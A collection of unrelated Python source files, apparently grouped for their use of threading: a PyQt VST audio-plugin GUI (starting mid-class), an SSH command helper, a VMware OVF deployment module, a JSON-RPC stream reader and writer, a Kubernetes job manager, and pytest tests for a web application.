# log message colors
self.textBrowser.text_colors = {
'ERROR': QtGui.QColor(255, 32, 32),
'WARNING': QtGui.QColor(220, 64, 64),
'INFO': QtGui.QColor(212, 224, 212),
'DEBUG': QtGui.QColor(212, 212, 64)
}
# opes/save filepaths
self._files_last_path = settings.get("files_last_path", "C://")
self._files_out_last_path = settings.get("files_out_last_path", "C://")
self.line_edit_out_folder.setText(self._files_out_last_path)
self._vst_last_path = settings.get("vst_last_path", "C://")
self._job_last_path = settings.get("job_last_path", "C://")
def _ui_save_settings(self):
# create settings dict
settings = {}
# main window
settings["main_window_size"] = [self.size().width(), self.size().height()]
settings["main_window_position"] = [self.geometry().x()-1, self.geometry().y()-31]
# global color style
settings["theme_style"] = self.style_name
# dock widget (logging window)
settings["dock_window_visible"] = self.dockWidget.isVisible()
settings["dock_window_location"] = self.dock_window_location
settings["dock_window_size"] = [self.dockWidget.size().width(), self.dockWidget.size().height()]
settings["dock_window_position"] = [self.dockWidget.geometry().x()-1, self.dockWidget.geometry().y()-31]
#
settings["table_files_columns"] = [
self.table_widget_files.columnWidth(0),
self.table_widget_files.columnWidth(1),
self.table_widget_files.columnWidth(2)
]
# open/save filepaths
settings["files_last_path"] = self._files_last_path
settings["files_out_last_path"] = self.line_edit_out_folder.text()
settings["vst_last_path"] = self._vst_last_path
settings["job_last_path"] = self._job_last_path
# save all settings
self.ui_settings.save(**settings)
def _ui_style_set(self, **kwargs):
if "name" in kwargs:
name = kwargs["name"]
else:
name = self.sender().objectName()
if 'Light' in name:
self.style_name = 'Light'
self.setStyleSheet("")
elif 'Dark' in name:
self.style_name = 'Dark'
self.setStyleSheet("background-color: rgb(76, 76, 76);\ncolor: rgb(255, 255, 255);")
self.anim.scene.setBackgroundBrush(self.palette().color(QtGui.QPalette.Background))
self.anim_2.scene.setBackgroundBrush(self.palette().color(QtGui.QPalette.Background))
def _dock_window_lock_changed(self, arg):
self.dock_window_location = arg
def _put_start_message(self):
import neil_vst
import neil_vst_gui.tag_write as tag_write
import sounddevice
import numpy
self._start_msg = [
'VST2.4 Host/Plugins chain worker GUI build %s beta.' % __version__,
'',
'Used:',
'[ py-neil-vst %s ]' % neil_vst.__version__,
'[ tag-write-util %s ]' % tag_write.__version__,
'[ soundfile %s ]' % soundfile.__version__,
'[ sounddevice %s ]' % sounddevice.__version__,
'[ numpy %s ]' % numpy.__version__,
'[ PyQt5 ]',
'',
'The fully free and open-sourse project.',
'Multiprocessing, minimum memory footprint, fastest work and maximum quality.',
'',
'The contributors:',
'Vladislav Kamenev :: LeftRadio',
'Ildar Muhamadullin :: Muha',
'',
'Special big thanks to all who supported the project.',
'',
"Add input audio files, add needed VST2 plugins and it's settings, set out files metadata.",
'That all. Click the "START" and enjoy with the result ;)',
'',
'Wait start the working ...\n' ]
self.nqueue.put('start_message')
del(neil_vst)
del(tag_write)
# -------------------------------------------------------------------------
def _job_open(self):
json_file, _ = QtWidgets.QFileDialog.getOpenFileName(
self,
'open files',
self._job_last_path,
'JSON (*.json)'
)
if not json_file:
return
self._job_last_path = QtCore.QFileInfo(json_file).path()
try:
self.job.load(json_file)
#
self._plugin_remove_all()
for v in self.job.settings["plugins_list"].values():
plugin = self._plugin_add(v["path"])
self.job.plugin_parameters_set(plugin, v["params"])
#
normalize = self.job.settings["normalize"]
self.check_box_normalize_enable.setChecked(normalize["enable"]),
self.line_edit_normalize_rms_level.setText( str(normalize["target_rms"]) )
self.line_edit_normalize_error_db.setText( str(normalize["error_db"]) )
#
self.logger.info("JOB loaded from '%s' [ SUCCESS ]" % os.path.basename(json_file))
title = self.windowTitle()
self.setWindowTitle("%s [ %s ]" % (title.split("[")[0], os.path.basename(json_file)))
except Exception as e:
self.logger.error("JOB load from '%s' [ ERROR ], check job file for correct sctructure" % os.path.basename(json_file))
self.logger.debug(str(e))
def _job_save(self):
json_file, _ = QtWidgets.QFileDialog.getSaveFileName(
self,
'save file',
self._job_last_path,
'JSON (*.json)'
)
if not json_file:
return
try:
self.job.update(
filepath=json_file,
normilize_params=self._normilize_settings()
)
self.logger.info("JOB saved to - %s [ SUCCESS ], set DEBUG level for details" % json_file)
self.logger.debug("filepath - %s, normilize_params - %s" % (json_file, self._normilize_settings()))
except Exception as e:
self.logger.error("JOB save to - %s [ ERROR ], set DEBUG level for details" % json_file)
self.logger.debug(str(e))
# -------------------------------------------------------------------------
def _files_open_click(self):
in_files = QtWidgets.QFileDialog.getOpenFileNames(
self,
'open files',
self._files_last_path,
'Audio (*.aiff *.flac *.wav *ogg)'
)
if not len(in_files[0]):
return
self._files_last_path = QtCore.QFileInfo(in_files[0][0]).path()
self.job.set_in_files(in_files[0])
self._files_update_table(self.job.in_files)
def _files_update_table(self, filelist):
table = self.table_widget_files
self._files_clear_table()
for f in sorted(filelist ):
if f in [table.item(r, 0).text() for r in range(table.rowCount())]:
continue
#
table.setRowCount(table.rowCount() + 1)
# pathname
table.setItem(table.rowCount()-1, 0, QtWidgets.QTableWidgetItem(os.path.basename(f)))
# size
item = QtWidgets.QTableWidgetItem("%.2f MB" % (os.stat(f).st_size/(1024*1024)))
item.setTextAlignment(QtCore.Qt.AlignHCenter)
table.setItem(table.rowCount()-1, 1, item)
# description
chs = ["Mono", "Stereo", "", "4 CH"]
load_file = soundfile.SoundFile(f, mode='r', closefd=True)
decs_text = "%s kHz %s %s" % (load_file.samplerate/1000, chs[load_file.channels-1], load_file.subtype)
item = QtWidgets.QTableWidgetItem(decs_text)
item.setTextAlignment(QtCore.Qt.AlignHCenter)
table.setItem(table.rowCount()-1, 2, item)
def _files_remove_selected(self):
indexes = self.table_widget_processes.selectedIndexes()
if len(indexes) <= 0:
return
for i in indexes:
self.job.file_remove(self.table_widget_files.item(i, 0).text())
self.table_widget_files.removeRow(i)
def _files_clear_table(self):
while self.table_widget_files.rowCount():
self.table_widget_files.removeRow(0)
def _files_remove_all(self):
self._files_clear_table()
self.job.files_remove_all()
def _files_out_folder_click(self):
dir_name = QtWidgets.QFileDialog.getExistingDirectory(
self,
"Open Directory",
self._files_out_last_path,
QtWidgets.QFileDialog.ShowDirsOnly | QtWidgets.QFileDialog.DontResolveSymlinks
)
self.line_edit_out_folder.setText(dir_name)
# -------------------------------------------------------------------------
def play_start_click(self):
self._play_position_change_start_flag = False
self.play_start_thread()
def play_start_thread(self, position=0):
t = threading.Thread(target=self.play_start, args=(position,))
t.daemon = True # thread dies when main thread exits.
t.start()
def play_start(self, position=0):
file_index = self.table_widget_files.currentRow()
if file_index < 0:
return
self.button_play_start.setEnabled(False)
self.button_play_stop.setEnabled(True)
self.table_widget_files.setEnabled(False)
self.play_start_pos_slider = self.horizontal_slider_play.value()
play_start_pos = self.play_start_pos_slider / self.horizontal_slider_play.maximum()
try:
self.play_chain.start(
filename=self.job.in_files[file_index],
audio_device=self.combo_box_sound_device.currentText(),
channels=2,
vst_host=self.main_worker.host(),
vst_plugins_chain=self.job.vst_plugins_chain,
start=play_start_pos
)
except Exception as e:
self.logger.error(str(e))
self.play_chain.stop()
def play_stop_click(self):
self.play_chain.stop()
def play_stop_slot(self):
self.button_play_start.setEnabled(True)
self.button_play_stop.setEnabled(False)
self.table_widget_files.setEnabled(True)
if self.horizontal_slider_play.value() >= self.horizontal_slider_play.maximum()-1:
self.horizontal_slider_play.setValue(self.horizontal_slider_play.minimum())
def play_selected(self, row, column):
if row < 0:
self.button_play_start.setEnable(False)
return
self.group_box_play.setTitle(self.group_box_play.title().split(" - ")[0] + " - [ %s ]" % os.path.basename(self.job.in_files[row]))
self.button_play_start.setEnabled(True)
self.horizontal_slider_play.setEnabled(True)
def play_progress_update(self, procent_value):
if self.play_chain.is_active() and not self._play_position_change_start_flag:
slider_val = int(self.play_start_pos_slider + procent_value*self.horizontal_slider_play.maximum())
self.horizontal_slider_play.setValue(slider_val)
# print(self.horizontal_slider_play.value())
def play_position_change_start(self):
self._play_position_change_start_flag = True
def play_position_change_end(self):
if self.play_chain.is_active():
self.play_chain.stop()
sleep(0.25)
self.play_start_thread()
self._play_position_change_start_flag = False
# -------------------------------------------------------------------------
def _normilize_settings(self):
return {
"enable": self.check_box_normalize_enable.isChecked(),
"target_rms": float(self.line_edit_normalize_rms_level.text()),
"error_db": float(self.line_edit_normalize_error_db.text())
}
def _plugin_add(self, pathname):
try:
plugin = self.main_worker.vst_dll_load(pathname, self.logger)
self.logger.debug(plugin.info())
except Exception as e:
self.logger.error('[ ERROR ] while load "%s"' % os.path.basename(pathname))
self.logger.debug(str(e))
return
self.job.vst_add_to_chain(plugin)
#
table = self.table_widget_processes
#
index = table.rowCount()
table.setRowCount(index+1)
#
item = QtWidgets.QTableWidgetItem(plugin.name)
item.setTextAlignment(QtCore.Qt.AlignHCenter)
table.setItem(index, 0, item)
#
self.logger.info('Add VST - "%s"' % plugin.name)
#
return plugin
def _plugin_add_click(self):
vst_dll, _ = QtWidgets.QFileDialog.getOpenFileName(
self,
'open VST plugin file',
self._vst_last_path,
'VST dll (*.dll)'
)
if not vst_dll:
return
self._vst_last_path = QtCore.QFileInfo(vst_dll).path()
self._plugin_add(vst_dll)
def _plugin_change_click(self):
index = self.table_widget_processes.currentRow()
w = VSTPluginWindow(self.job.vst_plugins_chain[index], parent=self)
w.show()
def _plugin_up_click(self):
#
table = self.table_widget_processes
select_row = table.currentRow()
if select_row <= 0:
return
self.job.vst_swap_in_chain(select_row, select_row - 1)
select_item = table.takeItem(select_row, 0)
change_item = table.takeItem(select_row - 1, 0)
table.setItem(select_row - 1, 0, select_item)
table.setItem(select_row, 0, change_item)
table.setCurrentCell(select_row - 1, 0, QtCore.QItemSelectionModel.SelectCurrent)
def _plugin_down_click(self):
#
table = self.table_widget_processes
select_row = table.currentRow()
if select_row >= table.rowCount()-1:
return
self.job.vst_swap_in_chain(select_row, select_row + 1)
select_item = table.takeItem(select_row, 0)
change_item = table.takeItem(select_row + 1, 0)
table.setItem(select_row + 1, 0, select_item)
table.setItem(select_row, 0, change_item)
table.setCurrentCell(select_row + 1, 0, QtCore.QItemSelectionModel.SelectCurrent)
def _plugin_remove_selected_click(self):
index = self.table_widget_processes.currentRow()
if index < 0 or index > self.table_widget_processes.rowCount()-1:
return
self.table_widget_processes.removeRow(index)
self.job.vst_remove_from_chain(index)
def _plugin_remove_all(self):
while self.table_widget_processes.rowCount():
self.table_widget_processes.removeRow(0)
self.job.vst_remove_all()
# -------------------------------------------------------------------------
def _tag_data(self):
return (
self.line_edit_metadata_author.text(),
self.line_edit_metadata_artist.text(),
self.line_edit_metadata_sound_designer.text(),
self.line_edit_metadata_album_book.text(),
self.line_edit_metadata_genre.text(),
self.line_edit_metadata_year.text(),
self.text_edit_metadata_description.toPlainText(),
self.line_edit_metadata_image.text()
)
def _tag_metadata_image_select_click(self):
image_file, _ = QtWidgets.QFileDialog.getOpenFileNames(
self,
'Open File',
self._files_last_path,
'Images (*.bmp *.png *.jpg)'
)
if not len(image_file):
return
self.line_edit_metadata_image.setText(image_file[0])
try:
pixmap = QtGui.QPixmap(image_file[0])
coeff = pixmap.width() / 450
self.label_metadata_image_show.setMinimumWidth(450)
self.label_metadata_image_show.setMaximumWidth(450)
self.label_metadata_image_show.setMinimumHeight(int(pixmap.height() / coeff))
self.label_metadata_image_show.setMaximumHeight(int(pixmap.height() / coeff))
self.label_metadata_image_show.setPixmap(pixmap)
except Exception as e:
self.logger.error("Error on draw the selected image [%s]" % str(e))
# -------------------------------------------------------------------------
def ui_thread(self):
""" The worker thread pulls an item from the queue and processes it """
while True:
item = self.nqueue.get()
with threading.Lock():
if item == 'start_message':
import random
for m in self._start_msg:
self.logger.info(m)
sleep(random.uniform(0.1, 0.2))
if item == 'run':
start = time()
while any(w.is_alive() for w in self.main_worker.processes):
sleep(0.01)
if not self.main_worker.terminate_work:
import datetime
sleep(0.5)
self.logger.info("[ END ] - Elapsed time: [ %s ]" % str(datetime.timedelta(seconds=(time()-(start+0.5)))).split(".")[0] )
self.ready_signal.emit()
if item == 'play':
self._play_start()
self.nqueue.task_done()
def start_work_click(self):
""" START button click slot """
sender_name = self.sender()
if not self.button_start_work.isEnabled() or not len(self.job.in_files):
return
self.button_start_work.setEnabled(False)
self.button_measurment.setEnabled(False)
self.button_stop_work.setEnabled(True)
self.tab_input_files.setEnabled(False)
self.tab_vst_process.setEnabled(False)
self.tab_metadata.setEnabled(False)
# set animation is fastest
self.anim.timer.setInterval(750)
# block until all tasks are done
self.nqueue.join()
# update all job parameters
self.job.update(
normilize_params=self._normilize_settings(),
out_folder=self.line_edit_out_folder.text(),
tag_data=self._tag_data()
)
try:
vst_buffer_size = int(self.line_edit_buffer_size_bytes.text())
except Exception as e:
self.logger.warning(
"VST buffer size is incorrect!"
"Please set numberic value in range: [ 1024..65536 ] bytes\n"
"Set the default buffer size: [ 1024 ]"
)
vst_buffer_size = 1024
# start the work
self.main_worker.start(
pipe=self.child_pipe,
job=self.job,
meas=("MEAS" in sender_name.text()),
vst_buffer_size=vst_buffer_size,
log_level=self.workers_logging_level
)
# wait while all processes are done
self.nqueue.put('run')
def stop_work_click(self):
if not self.button_stop_work.isEnabled():
return
self.main_worker.stop()
self.logger.warning("[TERMINATED]",)
self.end_work()
def end_work(self):
self.button_start_work.setEnabled(True)
self.button_measurment.setEnabled(True)
self.button_stop_work.setEnabled(False)
self.tab_input_files.setEnabled(True)
self.tab_vst_process.setEnabled(True)
self.tab_metadata.setEnabled(True)
self.anim.timer.setInterval(2000)
old_progr = 0
def _progress_slot(self, progress):
if (progress - self.old_progr) > 20:
self.anim.timer.setInterval(600 - (progress * 5))
self.old_progr = progress
elif not progress:
self.old_progr = progress
# -------------------------------------------------------------------------
def _logger_init(self):
#
self.extra = {'ThreadName': current_process().name }
self.logger = logging.getLogger(current_process().name)
self.logger.setLevel(logging.DEBUG)
self.handler = MainLogHandler(self.logging_signal)
self.handler.setFormatter(logging.Formatter(
fmt='%(name)s - %(levelname)s - %(message)s', datefmt='%H:%M:%S'))
self.logger.addHandler(self.handler)
self.logging_signal.connect(self.text_browser_message)
# Create the logging communication pipes and emiter for all work processes
self.mother_pipe, self.child_pipe = Pipe()
self.log_emitter = ProcessLogEmitter(self.mother_pipe)
self.log_emitter.start()
self.log_emitter.ui_data_available.connect(self.text_browser_message)
def logging_level_changed(self, level_index):
levels = [ logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR ]
self.handler.setLevel(levels[level_index])
self.workers_logging_level = levels[level_index]
self.play_chain.log_level = levels[level_index]
def _mt_update_log(self, text):
""" Add text to the lineedit box. """
self.logger.info(text)
def text_browser_message(self, msg, level):
text_cursor = self.textBrowser.textCursor()
text_cursor.movePosition(QtGui.QTextCursor.End)
self.textBrowser.setTextCursor(text_cursor)
color = self.textBrowser.text_colors.get(level, self.textBrowser.text_colors['DEBUG'])
self.textBrowser.setTextColor(color)
self.textBrowser.insertPlainText("%s \r\n" % msg)
sb = self.textBrowser.verticalScrollBar()
sb.setValue(sb.maximum())
self.textBrowser.repaint()
def _log_clear(self):
self.textBrowser.clear()
# -------------------------------------------------------------------------
def _close_request(self):
self.close()
def closeEvent(self, event):
reply = QtWidgets.QMessageBox.question(
self,
'QUIT',
"Are you sure you want to exit the program?",
QtWidgets.QMessageBox.Yes,
QtWidgets.QMessageBox.No
)
if reply == QtWidgets.QMessageBox.No:
event.ignore()
return
# save GUI state
self._ui_save_settings()
event.accept()
def process_events(self):
QtWidgets.QApplication.processEvents()
def main():
freeze_support()
app = QtWidgets.QApplication(sys.argv)
QtWidgets.QApplication.setStyle(QtWidgets.QStyleFactory.create('Fusion'))
ex = neil_vst_gui_window()
sys.exit(app.exec_())
# program start here
if __name__ == '__main__':
main()
|
sshScripts.py
|
### This script is used to send commands to RPi over an SSH connection.
# Initiate connection by initating the class as connection = ssh(serverIP,sshUsername,sshPassword)
# Then send commands with connection.sendCommand('type_command_here')
from paramiko import client
from paramiko.ssh_exception import SSHException
from threading import Thread
class ssh:
# This class was taken from:
# https://daanlenaerts.com/blog/2016/01/02/python-and-ssh-sending-commands-over-ssh-using-paramiko/
# 09/12/16
client = None
def __init__(self, address, username, password):
self.address = address
self.client = client.SSHClient()
self.client.set_missing_host_key_policy(client.AutoAddPolicy())
self.client.connect(address, username=username, password=password, look_for_keys=False)
self.Ts_sendCommand = []
def sendCommand(self, command, timeout=5, verbose=True):
if(self.client):
try:
stdin, stdout, stderr = self.client.exec_command(command, timeout=timeout)
if verbose:
while not stdout.channel.exit_status_ready():
# Print data when available
if stdout.channel.recv_ready():
alldata = stdout.channel.recv(1024)
prevdata = b"1"
while prevdata:
prevdata = stdout.channel.recv(1024)
alldata += prevdata
print(str(alldata))
except SSHException as e:
if e.__str__() == 'Timeout opening channel.':
print('ERROR: Command timeout!' + '\nFailed to send command: ' + command + ' | To: ' + self.address)
elif e.__str__() == 'SSH session not active':
print('ERROR: Connection lost!' + '\nFailed to send command: ' + command + ' | To: ' + self.address)
else:
raise e
else:
print("Connection not opened.")
def sendCommand_threading(self, command, timeout=5, verbose=True):
T = Thread(target=self.sendCommand, args=(command, timeout, verbose))
T.start()
self.Ts_sendCommand.append(T)
def testConnection(self, timeout=5):
'''
Returns True if connection is active. False if connection inactive until timeout or session inactive.
'''
if(self.client):
try:
stdin, stdout, stderr = self.client.exec_command('ls', timeout=timeout)
return True
except SSHException as e:
if e.__str__() == 'Timeout opening channel.':
return False
elif e.__str__() == 'SSH session not active':
return False
else:
raise e
else:
return False
def disconnect(self, force=False):
if(self.client):
if not force and len(self.Ts_sendCommand) > 0:
for T in self.Ts_sendCommand:
T.join()
self.client.close()
else:
print("Connection not opened.")
|
ovf.py
|
# Copyright (c) 2019 VMware, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
from os import path
# from sys import exit
from threading import Thread
from time import sleep
# from argparse import ArgumentParser
# from getpass import getpass
import requests
# from pyVim import connect
from pyVmomi import vim
# from pyVmomi.VmomiSupport import long
from vio.vsphere import utils
def get_ovf_descriptor(ovf_path):
"""
Read in the OVF descriptor.
"""
if path.exists(ovf_path):
with open(ovf_path, 'r') as f:
try:
ovfd = f.read()
f.close()
return ovfd
except Exception as ex:
raise Exception("Could not read file %s: %s" % (
ovf_path, str(ex)))
def get_obj_in_list(obj_name, obj_list):
"""
Gets an object out of a list (obj_list) whos name matches obj_name.
"""
for o in obj_list:
if o.name == obj_name:
return o
raise Exception("Unable to find object by the name of %s in list:%s" %
(o.name, map(lambda o: o.name, obj_list)))
def get_objects(si, datacenter_name=None, datastore_name=None,
cluster_name=None):
"""
Return a dict containing the necessary objects for deployment.
"""
# Get datacenter object.
datacenter_list = si.content.rootFolder.childEntity
if datacenter_name:
datacenter_obj = get_obj_in_list(datacenter_name, datacenter_list)
else:
datacenter_obj = datacenter_list[0]
# Get datastore object.
datastore_list = datacenter_obj.datastoreFolder.childEntity
if datastore_name:
datastore_obj = get_obj_in_list(datastore_name, datastore_list)
elif len(datastore_list) > 0:
datastore_obj = datastore_list[0]
else:
print("No datastores found in DC (%s)." % datacenter_obj.name)
# Get cluster object.
cluster_list = datacenter_obj.hostFolder.childEntity
if cluster_name:
cluster_obj = get_obj_in_list(cluster_name, cluster_list)
elif len(cluster_list) > 0:
cluster_obj = cluster_list[0]
else:
print("No clusters found in DC (%s)." % datacenter_obj.name)
# Generate resource pool.
resource_pool_obj = cluster_obj.resourcePool
return {"datacenter": datacenter_obj,
"datastore": datastore_obj,
"resource pool": resource_pool_obj}
def keep_lease_alive(lease):
"""
Keeps the lease alive while POSTing the VMDK.
"""
while(True):
sleep(5)
try:
# Choosing arbitrary percentage to keep the lease alive.
lease.HttpNfcLeaseProgress(50)
if (lease.state == vim.HttpNfcLease.State.done):
return
# If the lease is released, we get an exception.
# Returning to kill the thread.
except Exception:
return
def deploy_ovf(si, vmdk_path, ovf_path, datacenter, cluster, datastore):
default_ovf = False
if ovf_path is None:
default_ovf = True
cpath = path.dirname(path.realpath(__file__))
ovf_path = cpath + "/templates/template.ovf"
# import ipdb; ipdb.set_trace()
vmdk_meta = utils.vmdk_metadata(vmdk_path)
# vmdk_size = path.getsize(vmdk_path)
ovfd = get_ovf_descriptor(ovf_path)
objs = get_objects(si, datacenter, datastore, cluster)
manager = si.content.ovfManager
spec_params = vim.OvfManager.CreateImportSpecParams()
print("Creating import ovf spec")
import_spec = manager.CreateImportSpec(ovfd,
objs["resource pool"],
objs["datastore"],
spec_params)
if default_ovf:
import_spec.importSpec.configSpec.deviceChange[
1].device.capacityInKB = int(vmdk_meta['size'])
lease = objs["resource pool"].ImportVApp(import_spec.importSpec,
objs["datacenter"].vmFolder)
while(True):
if (lease.state == vim.HttpNfcLease.State.ready):
# Assuming single VMDK.
# url = lease.info.deviceUrl[0].url.replace('*', host)
url = lease.info.deviceUrl[0].url
# Spawn a dawmon thread to keep the lease active while POSTing
# VMDK.
keepalive_thread = Thread(target=keep_lease_alive, args=(lease,))
keepalive_thread.start()
print("Uploading %s to %s" % (vmdk_path, url))
# POST the VMDK to the host via curl. Requests library would work
# too.
# curl_cmd = (
# "curl -Ss -X POST --insecure -T %s -H 'Content-Type: \
# application/x-vnd.vmware-streamVmdk' %s" %
# (vmdk_path, url))
# system(curl_cmd)
headers = {'Content-Type': 'application/x-vnd.vmware-streamVmdk'}
client_cookie = si._stub.cookie
cookie_name = client_cookie.split("=", 1)[0]
cookie_value = client_cookie.split("=", 1)[1].split(";", 1)[0]
cookie_path = client_cookie.split("=", 1)[1].split(
";", 1)[1].split(";", 1)[0].lstrip()
cookie_text = " " + cookie_value + "; $" + cookie_path
# Make a cookie
cookie = dict()
cookie[cookie_name] = cookie_text
with open(vmdk_path, "rb") as f:
resp = requests.post(url,
# params=params,
data=f,
# files={"file": f},
headers=headers,
cookies=cookie,
verify=False)
print("Upload results %s: %s" % (
resp.status_code, resp.content))
lease.HttpNfcLeaseComplete()
keepalive_thread.join()
return
elif (lease.state == vim.HttpNfcLease.State.error):
raise Exception("Lease error: " + lease.error.msg)
|
jsonrpc_stream.py
|
# pyre-strict
from __future__ import absolute_import, division, print_function, unicode_literals
import json
from queue import Empty, Queue
from threading import Thread
from typing import BinaryIO, Optional
from utils import Json
class JsonRpcStreamReader:
def __init__(self, stream: BinaryIO) -> None:
self.stream = stream
# pyre-fixme[11]: Annotation `Json` is not defined as a type.
# pyre-fixme[11]: Annotation `Json` is not defined as a type.
self.queue: Queue[Json] = Queue()
# daemon ensures the reading thread will get cleaned up when
# the main program exits. no need to explicitly manage it.
self.read_thread = Thread(target=self._async_read_loop, daemon=True)
self.read_thread.start()
def read(self, timeout_seconds: float) -> Optional[Json]:
try:
return self.queue.get(block=True, timeout=timeout_seconds)
except Empty:
return None
def _async_read_loop(self) -> None:
while True:
try:
self.queue.put(json.loads(self._read_payload()))
except ValueError:
break
except IndexError:
break
def _read_content_length(self) -> int:
# read the 'Content-Length:' line and absorb the newline
# after it
length_line = self.stream.readline().decode()
self.stream.read(len("\r\n"))
# get the content length as an integer for the
# rest of the package
parts = length_line.split(":", 1)
return int(parts[1].strip())
def _read_content(self, length: int) -> bytes:
return self.stream.read(length)
def _read_payload(self) -> bytes:
length = self._read_content_length()
return self._read_content(length)
class JsonRpcStreamWriter:
def __init__(self, stream: BinaryIO) -> None:
self.stream = stream
def write(self, json_data: Json) -> None:
serialized = json.dumps(json_data)
content_length = len(serialized)
payload = "Content-Length: {c}\n\n{s}".format(c=content_length, s=serialized)
self._write_string(payload)
def _write_string(self, s: str) -> None:
self.stream.write(s.encode())
self.stream.flush()
|
kubernetes.py
|
import os
import threading
import time
import kubernetes as k8s
from urllib3.exceptions import ProtocolError
from villas.controller.components.manager import Manager
from villas.controller.components.simulators.kubernetes import KubernetesJob
def _match(a, b):
if a == b:
return True
elif len(a) < len(b):
return a in b
elif len(b) < len(a):
return b in a
class KubernetesManager(Manager):
def __init__(self, **args):
super().__init__(**args)
self.thread_stop = threading.Event()
self.pod_watcher_thread = threading.Thread(
target=self._run_pod_watcher)
self.job_watcher_thread = threading.Thread(
target=self._run_job_watcher)
self.event_watcher_thread = threading.Thread(
target=self._run_event_watcher)
if os.environ.get('KUBECONFIG'):
k8s.config.load_kube_config()
else:
k8s.config.load_incluster_config()
self.namespace = args.get('namespace', 'default')
self.my_namespace = os.environ.get('NAMESPACE')
self.my_pod_name = os.environ.get('POD_NAME')
self.my_pod_uid = os.environ.get('POD_UID')
self._check_namespace(self.namespace)
# self.pod_watcher_thread.start()
# self.job_watcher_thread.start()
self.event_watcher_thread.setDaemon(True)
self.event_watcher_thread.start()
def _check_namespace(self, ns):
c = k8s.client.CoreV1Api()
namespaces = c.list_namespace()
for namespace in namespaces.items:
if namespace.metadata.name == ns:
return
raise RuntimeError(f'Namespace {ns} does not exist')
def _run_pod_watcher(self):
w = k8s.watch.Watch()
c = k8s.client.CoreV1Api()
for sts in w.stream(c.list_namespaced_pod,
namespace=self.namespace):
stso = sts.get('object')
typ = sts.get('type')
self.logger.info('%s Pod: %s', typ, stso.metadata.name)
def _run_job_watcher(self):
w = k8s.watch.Watch()
b = k8s.client.BatchV1Api()
for sts in w.stream(b.list_namespaced_job,
namespace=self.namespace):
stso = sts.get('object')
typ = sts.get('type')
self.logger.info('%s Job: %s', typ, stso.metadata.name)
def _run_event_watcher(self):
while not self.thread_stop.is_set():
w = k8s.watch.Watch()
c = k8s.client.CoreV1Api()
try:
for e in w.stream(c.list_namespaced_event,
namespace=self.namespace,
timeout_seconds=5):
if self.thread_stop.is_set():
return
eo = e.get('object')
self.logger.info('Event: %s (reason=%s)', eo.message,
eo.reason)
for uuid in self.components:
comp = self.components[uuid]
if not comp.job:
continue
if _match(comp.job.metadata.name,
eo.involved_object.name):
if eo.reason == 'Completed':
comp.change_state('stopping', True)
elif eo.reason == 'Started':
comp.pods.add(eo.involved_object.name)
comp.change_state('running', True)
elif eo.reason == 'BackoffLimitExceeded':
comp.change_to_error('failed to start job',
reason=eo.reason)
elif eo.reason == 'Failed':
if comp._state == 'running':
comp.change_to_error('failed to start job',
error=eo.reason)
elif comp._state == 'starting':
# wait for BackoffLimitExceeded event
continue
else:
self.logger.info('Reason \'%s\' not handled '
'for kubernetes simulator',
eo.reason)
except ProtocolError:
self.logger.warn('Connection to kubernetes broken, \
attempting reconnect..')
time.sleep(1)
def create(self, payload):
parameters = payload.get('parameters', {})
comp = KubernetesJob(self, **parameters)
self.add_component(comp)
def delete(self, payload):
parameters = payload.get('parameters')
uuid = parameters.get('uuid')
try:
comp = self.components[uuid]
comp.on_delete()
self.remove_component(comp)
except KeyError:
self.logger.error('There is no component with UUID: %s', uuid)
def on_shutdown(self):
self.logger.info('Stopping Kubernetes watchers')
self.thread_stop.set()
if self.pod_watcher_thread.is_alive():
self.pod_watcher_thread.join()
if self.job_watcher_thread.is_alive():
self.job_watcher_thread.join()
if self.event_watcher_thread.is_alive():
self.event_watcher_thread.join()
return super().on_shutdown()
|
pow_tests.py
|
#
# Pow Default Tests
#
#
# runtest script.
# runs test with respect to some paramters
# currently only os
import sys
import pytest
# possible sys.platform results:
# http://stackoverflow.com/questions/446209/possible-values-from-sys-platform
MODELNAME = "pow_test_model"
class TestClass:
@pytest.mark.notonosx
@pytest.mark.run(order=1)
@pytest.mark.minimal
def test_server(self):
""" test if server starts
calls baseurl:port/test/12
must return 12.
This test the server, routing and method dispatching
"""
print(" .. Test if server works" )
from multiprocessing import Process
import coronadash.server
import requests
import coronadash.conf.config as cfg
import time
p = Process(target=coronadash.server.main)
p.start()
testurl=cfg.server_settings["protocol"] + cfg.server_settings["host"] + ":" + str(cfg.server_settings["port"]) + "/test/12"
r = requests.get(testurl)
p.terminate()
assert int(r.text)==12
@pytest.mark.run(order=2)
@pytest.mark.minimal
def test_sql_generate_model(self):
""" test if sql model is generated"""
print(" .. Test generate_model")
import coronadash.generate_model as gm
import uuid
import os.path
ret = gm.generate_model(MODELNAME, "sql", appname="coronadash")
# generate model returns true in case of success
assert ret is True
assert os.path.exists(os.path.normpath("../models/sql/" + MODELNAME + ".py"))
@pytest.mark.run(order=3)
@pytest.mark.minimal
def test_sql_model_type(self):
""" based on test_generate_model. Tests if a model can insert values
DB sqlite by default.
"""
print(" .. Test model is correct type")
from coronadash.models.sql.pow_test_model import PowTestModel
m = PowTestModel()
assert isinstance(m, PowTestModel)
@pytest.mark.run(order=4)
def test_sql_dbsetup(self):
""" test the setup of the alembic environment """
print(" .. Test SQL: db_setup")
import coronadash.init_sqldb_environment
import os
os.chdir("..")
r = coronadash.init_sqldb_environment.init_migrations()
assert r == True
os.chdir(os.path.abspath(os.path.dirname(__file__)))
@pytest.mark.run(order=5)
def test_sql_migration(self):
""" test the setup of the alembic environment
generate a migration
"""
print(" .. Test SQL: generate_migration")
import coronadash.generate_migration
import os
os.chdir("..")
script = coronadash.generate_migration.generate_migration(message="pow_test")
assert os.path.exists(os.path.normpath(script.path))
os.chdir(os.path.abspath(os.path.dirname(__file__)))
@pytest.mark.run(order=6)
def test_sql_dbupdate(self):
""" test the setup of the alembic environment
actually migrate the DB schema up
"""
print(" .. Test SQL: update_db -d up")
import coronadash.update_db
import os, time
ret = None
os.chdir("..")
time.sleep(1)
try:
ret = coronadash.update_db.migrate("up")
except Exception as e:
print(e)
ret = True
time.sleep(5)
os.chdir(os.path.abspath(os.path.dirname(__file__)))
@pytest.mark.run(order=7)
def test_if_sql_model_validation_works(self):
"""
check if validation works
"""
print(" .. Test SQL: model.upsert() and model.find()")
